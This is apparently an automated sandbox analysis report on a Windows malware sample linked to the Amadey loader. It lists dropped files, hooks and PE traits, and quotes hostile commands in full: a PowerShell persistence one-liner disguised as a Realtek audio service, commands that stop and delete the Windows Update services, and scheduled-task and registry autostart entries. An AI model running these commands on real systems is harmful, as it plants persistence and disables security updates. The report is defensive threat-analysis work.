Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qgoyddbo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'RtkAudUService64.exe' /tr '''C:\Users\user\Locktime\RtkAudUService64.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Locktime\RtkAudUService64.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'RtkAudUService64.exe' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RtkAudUService64.exe" /t REG_SZ /f /d 'C:\Users\user\Locktime\RtkAudUService64.exe' }
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\ProgramData\61312899942613011832.exe

File created: C:\Users\user\AppData\Local\Temp\03bd543fce

Jump to behavior

Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3076:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5192:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5604:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\118b2709b7d16171ccdcf59ab82ccd18
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5248:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Mutant created: \Sessions\1\BaseNamedObjects\c33e9ad058e5d380869687d885c0668c

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\umciavi32[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe, type: DROPPED

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: DQxttu2Qrr.exe

Static file information: File size 7387352 > 1048576

Source: DQxttu2Qrr.exe

Static PE information: Raw size of .rrt02 is bigger than: 0x100000 < 0x704c00

Source: DQxttu2Qrr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Carafej mamib cemike\xiwati\Dedexaj wahiraje\jeweyohe kajexef.pdb source: umciavi64.exe, 00000031.00000002.647446249.0000000000D5E000.00000002.00000001.01000000.0000000F.sdmp, umciavi64.exe, 00000031.00000000.425031565.0000000000D5E000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

Code function: 26_3_000001830AEE3027 push es; ret

26_3_000001830AEE3152

PE file contains sections with non-standard names

Source: DQxttu2Qrr.exe	Static PE information: section name: .rrt00
Source: DQxttu2Qrr.exe	Static PE information: section name: .rrt01
Source: DQxttu2Qrr.exe	Static PE information: section name: .rrt02
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: lB@dO\ih
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: Fh?jG[OJ
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: qNR5:WbS
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: z?fd8ijJ
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: CV?7x>JO
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: EVjKc_MI
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: dT<:EHzj
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: @]topACL
Source: nppshell[1].exe.0.dr	Static PE information: section name: lB@dO\ih
Source: nppshell[1].exe.0.dr	Static PE information: section name: Fh?jG[OJ
Source: nppshell[1].exe.0.dr	Static PE information: section name: qNR5:WbS
Source: nppshell[1].exe.0.dr	Static PE information: section name: z?fd8ijJ
Source: nppshell[1].exe.0.dr	Static PE information: section name: CV?7x>JO
Source: nppshell[1].exe.0.dr	Static PE information: section name: EVjKc_MI
Source: nppshell[1].exe.0.dr	Static PE information: section name: dT<:EHzj
Source: nppshell[1].exe.0.dr	Static PE information: section name: @]topACL
Source: gntuud.exe.4.dr	Static PE information: section name: lB@dO\ih
Source: gntuud.exe.4.dr	Static PE information: section name: Fh?jG[OJ
Source: gntuud.exe.4.dr	Static PE information: section name: qNR5:WbS
Source: gntuud.exe.4.dr	Static PE information: section name: z?fd8ijJ
Source: gntuud.exe.4.dr	Static PE information: section name: CV?7x>JO
Source: gntuud.exe.4.dr	Static PE information: section name: EVjKc_MI
Source: gntuud.exe.4.dr	Static PE information: section name: dT<:EHzj
Source: gntuud.exe.4.dr	Static PE information: section name: @]topACL
Source: syncfiles[1].dll.13.dr	Static PE information: section name: *;>%1sXO
Source: syncfiles[1].dll.13.dr	Static PE information: section name: 7rP!Ni:j
Source: syncfiles[1].dll.13.dr	Static PE information: section name: bkE<E2?8
Source: syncfiles[1].dll.13.dr	Static PE information: section name: 8*7`Joyq
Source: syncfiles[1].dll.13.dr	Static PE information: section name: 0Ys'"rSd
Source: syncfiles[1].dll.13.dr	Static PE information: section name: nUPwRZiK
Source: syncfiles[1].dll.13.dr	Static PE information: section name: $u!6XeN&
Source: syncfiles[1].dll.13.dr	Static PE information: section name: K)'tLNvc
Source: syncfiles.dll.13.dr	Static PE information: section name: *;>%1sXO
Source: syncfiles.dll.13.dr	Static PE information: section name: 7rP!Ni:j
Source: syncfiles.dll.13.dr	Static PE information: section name: bkE<E2?8
Source: syncfiles.dll.13.dr	Static PE information: section name: 8*7`Joyq
Source: syncfiles.dll.13.dr	Static PE information: section name: 0Ys'"rSd
Source: syncfiles.dll.13.dr	Static PE information: section name: nUPwRZiK
Source: syncfiles.dll.13.dr	Static PE information: section name: $u!6XeN&
Source: syncfiles.dll.13.dr	Static PE information: section name: K)'tLNvc
Source: cred64[1].dll.13.dr	Static PE information: section name: f5g\gWe7
Source: cred64[1].dll.13.dr	Static PE information: section name: zDthL)*@
Source: cred64[1].dll.13.dr	Static PE information: section name: nb"h!m#Y
Source: cred64[1].dll.13.dr	Static PE information: section name: $^+<%+dU
Source: cred64[1].dll.13.dr	Static PE information: section name: Z-),j99t
Source: cred64[1].dll.13.dr	Static PE information: section name: 8"ikKHD[
Source: cred64[1].dll.13.dr	Static PE information: section name: k&l<0?<6
Source: cred64[1].dll.13.dr	Static PE information: section name: n[uZh3ex
Source: cred64[1].dll.13.dr	Static PE information: section name: Uh%r6i!H
Source: cred64.dll.13.dr	Static PE information: section name: f5g\gWe7
Source: cred64.dll.13.dr	Static PE information: section name: zDthL)*@
Source: cred64.dll.13.dr	Static PE information: section name: nb"h!m#Y
Source: cred64.dll.13.dr	Static PE information: section name: $^+<%+dU
Source: cred64.dll.13.dr	Static PE information: section name: Z-),j99t
Source: cred64.dll.13.dr	Static PE information: section name: 8"ikKHD[
Source: cred64.dll.13.dr	Static PE information: section name: k&l<0?<6
Source: cred64.dll.13.dr	Static PE information: section name: n[uZh3ex
Source: cred64.dll.13.dr	Static PE information: section name: Uh%r6i!H
Source: Emit64[1].exe.13.dr	Static PE information: section name: 87*qGv;7
Source: Emit64[1].exe.13.dr	Static PE information: section name: ^NsFAbb[
Source: Emit64[1].exe.13.dr	Static PE information: section name: 4.ps1S["
Source: Emit64[1].exe.13.dr	Static PE information: section name: l^D/X#s1
Source: Emit64[1].exe.13.dr	Static PE information: section name: aAyXB94]
Source: Emit64[1].exe.13.dr	Static PE information: section name: n9Mms2uS
Source: Emit64[1].exe.13.dr	Static PE information: section name: 7u=]29J1
Source: Emit64[1].exe.13.dr	Static PE information: section name: *<5LK<h`
Source: Emit64[1].exe.13.dr	Static PE information: section name: Ug$Va';z
Source: Emit64[1].exe.13.dr	Static PE information: section name: dA:<*dF(
Source: Emit64[1].exe.13.dr	Static PE information: section name: r,Ht]nHV
Source: Emit64[1].exe.13.dr	Static PE information: section name: m$m2M1,9
Source: Emit64[1].exe.13.dr	Static PE information: section name: o?%]P5Wl
Source: Emit64[1].exe.13.dr	Static PE information: section name: lNMkoK?T
Source: Emit64.exe.13.dr	Static PE information: section name: 87*qGv;7
Source: Emit64.exe.13.dr	Static PE information: section name: ^NsFAbb[
Source: Emit64.exe.13.dr	Static PE information: section name: 4.ps1S["
Source: Emit64.exe.13.dr	Static PE information: section name: l^D/X#s1
Source: Emit64.exe.13.dr	Static PE information: section name: aAyXB94]
Source: Emit64.exe.13.dr	Static PE information: section name: n9Mms2uS
Source: Emit64.exe.13.dr	Static PE information: section name: 7u=]29J1
Source: Emit64.exe.13.dr	Static PE information: section name: *<5LK<h`
Source: Emit64.exe.13.dr	Static PE information: section name: Ug$Va';z
Source: Emit64.exe.13.dr	Static PE information: section name: dA:<*dF(
Source: Emit64.exe.13.dr	Static PE information: section name: r,Ht]nHV
Source: Emit64.exe.13.dr	Static PE information: section name: m$m2M1,9
Source: Emit64.exe.13.dr	Static PE information: section name: o?%]P5Wl
Source: Emit64.exe.13.dr	Static PE information: section name: lNMkoK?T
Source: avicapn32[1].exe.13.dr	Static PE information: section name: .n3DK0
Source: avicapn32[1].exe.13.dr	Static PE information: section name: .symtab
Source: avicapn32[1].exe.13.dr	Static PE information: section name: .n3DK1
Source: avicapn32[1].exe.13.dr	Static PE information: section name: .n3DK2
Source: avicapn32[1].exe.13.dr	Static PE information: section name: .n3DK3
Source: avicapn32.exe.13.dr	Static PE information: section name: .n3DK0
Source: avicapn32.exe.13.dr	Static PE information: section name: .symtab
Source: avicapn32.exe.13.dr	Static PE information: section name: .n3DK1
Source: avicapn32.exe.13.dr	Static PE information: section name: .n3DK2
Source: avicapn32.exe.13.dr	Static PE information: section name: .n3DK3
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: 87*qGv;7
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: ^NsFAbb[
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: 4.ps1S["
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: l^D/X#s1
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: aAyXB94]
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: n9Mms2uS
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: 7u=]29J1
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: *<5LK<h`
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: Ug$Va';z
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: dA:<*dF(
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: r,Ht]nHV
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: m$m2M1,9
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: o?%]P5Wl
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: lNMkoK?T

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .rrt02

PE file contains an invalid checksum

Source: umciavi32.exe.13.dr	Static PE information: real checksum: 0x2f4f7 should be: 0x1a069f
Source: umciavi32[1].exe.13.dr	Static PE information: real checksum: 0x2f4f7 should be: 0x1a069f
Source: jekppnay.tmp.26.dr	Static PE information: real checksum: 0x0 should be: 0x2ec3f
Source: advapi32.dll.49.dr	Static PE information: real checksum: 0x0 should be: 0x4a7fc

Source: initial sample	Static PE information: section name: .text entropy: 7.996278983729512
Source: initial sample	Static PE information: section name: .text entropy: 7.996278983729512

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

File created: C:\ProgramData\61312899942613011832.exe

Jump to dropped file

Drops PE files

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\nppshell[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	File created: C:\Users\user\Locktime\RtkAudUService64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	File created: C:\Users\user\AppData\Local\Temp\jekppnay.tmp	Jump to dropped file
Source: C:\ProgramData\61312899942613011832.exe	File created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\1000018002\avicapn32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	File created: C:\Users\user\AppData\Local\Temp\advapi32.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\avicapn32[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\umciavi32[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\syncfiles[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\1000019012\syncfiles.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\umciavi64[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Emit64[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File created: C:\ProgramData\61312899942613011832.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi32.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi64.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run syncfiles.dll	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run syncfiles.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run syncfiles.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi64.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi64.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi32.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi32.exe	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Memory written: PID: 2508 base: 680005 value: E9 FB 99 26 77	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Memory written: PID: 2508 base: 778E9A00 value: E9 0A 66 D9 88	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Memory written: PID: 2508 base: 690007 value: E9 7B 4C 29 77	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Memory written: PID: 2508 base: 77924C80 value: E9 8E B3 D6 88	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Memory written: PID: 5372 base: 660005 value: E9 FB 99 28 77	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Memory written: PID: 5372 base: 778E9A00 value: E9 0A 66 D7 88	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Memory written: PID: 5372 base: 670007 value: E9 7B 4C 2B 77	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Memory written: PID: 5372 base: 77924C80 value: E9 8E B3 D4 88	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 5780 base: 15D0005 value: E9 FB 99 31 76	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 5780 base: 778E9A00 value: E9 0A 66 CE 89	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 5780 base: 15E0007 value: E9 7B 4C 34 76	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 5780 base: 77924C80 value: E9 8E B3 CB 89	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: DB0005 value: E9 FB 99 B3 76	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 778E9A00 value: E9 0A 66 4C 89	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: DC0007 value: E9 7B 4C B6 76	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 77924C80 value: E9 8E B3 49 89	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: F70005 value: E9 FB BF 94 76	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 778BC000 value: E9 0A 40 6B 89	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: FA0008 value: E9 AB E0 95 76	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 778FE0B0 value: E9 60 1F 6A 89	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: FB0005 value: E9 CB 5A 95 73	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 74905AD0 value: E9 3A A5 6A 8C	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: FC0005 value: E9 5B B0 96 73	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 7492B060 value: E9 AA 4F 69 8C	Jump to behavior
